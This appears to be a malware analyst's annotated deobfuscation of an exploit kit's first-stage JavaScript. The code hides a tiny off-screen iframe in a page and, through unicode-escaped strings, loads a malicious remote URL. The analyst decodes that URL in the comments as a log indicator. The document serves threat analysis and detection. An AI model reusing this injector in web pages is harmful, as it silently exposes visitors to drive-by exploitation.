- Deobfuscated 1st-layer exploit kit JavaScript from Malware Traffic Analysis
- http://www.malware-traffic-analysis.net/2016/06/02/index.html
- original javascript posted here http://pastebin.com/KrvFUf5W
- *****
- Below is the code that results from the last statements in that JavaScript, which compile a decoded string into a function and then call it:
- NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ)); // new Function() compiles the string returned by vrDCFrjI(...) into executable code; vrDCFrjI and its two arguments are defined in the original paste, not here (presumably the string decoder; confirm against that paste)
- NLxwWpg(); // runs the compiled second layer; replacing this call with a dump of the string is how the layer can be recovered without executing it
- *****
- function MjE4Mzk3MzYzNw() { // Analyst note: creates a 13x13 iframe, positions it off-screen and appends it to <body>. Every DOM name and the target URL are spelled as \uXXXX escapes, presumably to defeat plain-string signatures. Nothing is declared with var, so every name below becomes a global.
- Sgjb6 = '\u006e' + '\u0061' + '\u0076' + '\u0069' + '\u0067' + '\u0061' + '\u0074' + '\u006f' + '\u0072'; // "navigator" (assigned but never read in this function)
- Sgjb5 = '\u0064' + '\u006f' + '\u0063' + '\u0075' + '\u006d' + '\u0065' + '\u006e' + '\u0074'; // "document"
- Sgjb7 = window; // alias for the global object
- Sgjb8 = document; // alias that is not referenced again below
- Sgjb9 = Sgjb7[Sgjb5]; // window["document"], the handle used for all DOM calls
- Sgjb = '\u0073' + '\u0072' + '\u0063'; // "src"
- FIMrs = '\u0069' + '\u0066' + '\u0072' + '\u0061' + '\u006d' + '\u0065'; // "iframe"
- RbGEGsI = '\u0063' + '\u0073' + '\u0073' + '\u0054' + '\u0065' + '\u0078' + '\u0074'; // "cssText"
- vBiNhRC = '\u0067' + '\u0065' + '\u0074' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074' + '\u0073' + '\u0042' + '\u0079' + '\u0054' + '\u0061' + '\u0067' + '\u004e' + '\u0061' + '\u006d' + '\u0065'; // "getElementsByTagName"
- WvVBTR = '\u0062' + '\u006f' + '\u0064' + '\u0079'; // "body"
- MAx = '\u0077' + '\u0069' + '\u0064' + '\u0074' + '\u0068'; // "width"
- gUtk = '\u0068' + '\u0065' + '\u0069' + '\u0067' + '\u0068' + '\u0074'; // "height"
- BUMx = '\u0061' + '\u0070' + '\u0070' + '\u0065' + '\u006e' + '\u0064' + '\u0043' + '\u0068' + '\u0069' + '\u006c' + '\u0064'; // "appendChild"
- PzmfZG = '\u0063' + '\u0072' + '\u0065' + '\u0061' + '\u0074' + '\u0065' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074'; // "createElement"
- Sgjb0 = '\u0073' + '\u0074' + '\u0079' + '\u006c' + '\u0065'; // "style"
- Sgjb1 = '\u0031' + '\u0033'; // "13"
- Sgjb2 = Sgjb1; // the same "13" is used for both width and height
- Sgjb3 = '\u0070' + '\u006f' + '\u0073' + '\u0069' + '\u0074' + '\u0069' + '\u006f' + '\u006e' + '\u003a' + '\u0061' + '\u0062' + '\u0073' + '\u006f' + '\u006c' + '\u0075' + '\u0074' + '\u0065' + '\u003b' + '\u006c' + '\u0065' + '\u0066' + '\u0074' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0035' + '\u0038' + '\u0070' + '\u0078' + '\u003b' + '\u0074' + '\u006f' + '\u0070' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0036' + '\u0038' + '\u0070' + '\u0078'; // "position:absolute;left:-1658px;top:-1668px" (negative offsets place the frame outside the visible page)
- Sgjb4 = Sgjb9[PzmfZG](FIMrs); // document.createElement("iframe")
- Sgjb4[MAx] = Sgjb2; // iframe.width = "13"
- Sgjb4[gUtk] = Sgjb2; // iframe.height = "13"
- Sgjb4[Sgjb0][RbGEGsI] = Sgjb3; // iframe.style.cssText = the off-screen positioning string
- Sgjb4[Sgjb] = '\u0068' + '\u0074' + '\u0074' + '\u0070' + '\u003a' + '\u002f' + '\u002f' + '\u0073' + '\u0074' + '\u0072' + '\u0061' + '\u0063' + '\u0068' + '\u0075' + '\u0062' + '\u0065' + '\u0064' + '\u0061' + '\u0062' + '\u0062' + '\u006c' + '\u0069' + '\u006e' + '\u0067' + '\u002e' + '\u0074' + '\u0068' + '\u006f' + '\u006d' + '\u0070' + '\u0073' + '\u006f' + '\u006e' + '\u0073' + '\u002d' + '\u006f' + '\u006e' + '\u006c' + '\u0069' + '\u006e' + '\u0065' + '\u002e' + '\u0063' + '\u006f' + '\u002e' + '\u0075' + '\u006b' + '\u002f' + '\u0059' + '\u0078' + '\u0075' + '\u005a' + '\u0059' + '\u0052' + '\u002f' + '\u0072' + '\u0054' + '\u006b' + '\u004e' + '\u006e' + '\u004c' + '\u0055' + '\u002f' + '\u0066' + '\u004f' + '\u0068' + '\u0058' + '\u0058' + '\u006a' + '\u0070' + '\u0065' + '\u0059' + '\u002f' + '\u0030' + '\u0030' + '\u0037' + '\u0035' + '\u0037' + '\u002f' + '\u0073' + '\u0064' + '\u006d' + '\u006d' + '\u0054' + '\u0071' + '\u0062' + '\u0077' + '\u0064' + '\u0078' + '\u002d' + '\u0030' + '\u0039' + '\u0032' + '\u0036' + '\u0032' + '\u0030' + '\u002d' + '\u007a' + '\u006b' + '\u0062' + '\u0067' + '\u0072' + '\u0077' + '\u0068' + '\u0069' + '\u002e' + '\u006a' + '\u0070' + '\u0067'; // iframe.src, decoded and defanged: hxxp://strachubedabbling[.]thompsons-online[.]co[.]uk/YxuZYR/rTkNnLU/fOhXXjpeY/00757/sdmmTqbwdx-092620-zkbgrwhi[.]jpg. The path ends in .jpg although it is loaded as a frame document. This host and path are the network indicator to search for in proxy and DNS logs.
- Sgjb9[vBiNhRC](WvVBTR)[0][BUMx + ''](Sgjb4) // document.getElementsByTagName("body")[0].appendChild(iframe); the + '' is a no-op concatenation; appending the frame triggers the request to the URL above
- }
- function ldNRgDCf() { // Analyst note: waits for document.body to exist, then calls the iframe injector MjE4Mzk3MzYzNw() once
- var FIMrs0 = setTimeout; // local alias, so the retry below does not name setTimeout directly
- var FIMrs1 = document.body; // null until the parser has created <body>
- return (!FIMrs1 ? FIMrs0(ldNRgDCf, 10) : MjE4Mzk3MzYzNw()); // no body yet: retry in 10 ms; body present: inject the iframe
- }
- ldNRgDCf(); // entry point of this layer: starts the wait-for-body loop as soon as the decoded code runs
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime